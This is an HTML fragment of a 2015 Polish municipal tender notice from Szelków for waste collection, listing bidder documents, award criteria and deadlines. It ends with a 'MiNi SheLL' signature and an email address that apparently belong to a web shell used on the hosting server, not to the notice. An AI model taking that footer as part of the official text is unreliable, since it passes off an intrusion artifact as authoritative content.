<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Częstotliwość odbioru  przez Wykonawcę odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szelkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Szelkowie, Stary Szelków 39, 06-220 Stary Szelków, powiat makowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2015 godzina 10:00, miejsce: Urząd Gminy w Szelkowie (Sekretariat), Stary Szelków 39, 06-220 Stary Szelków, powiat makowski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com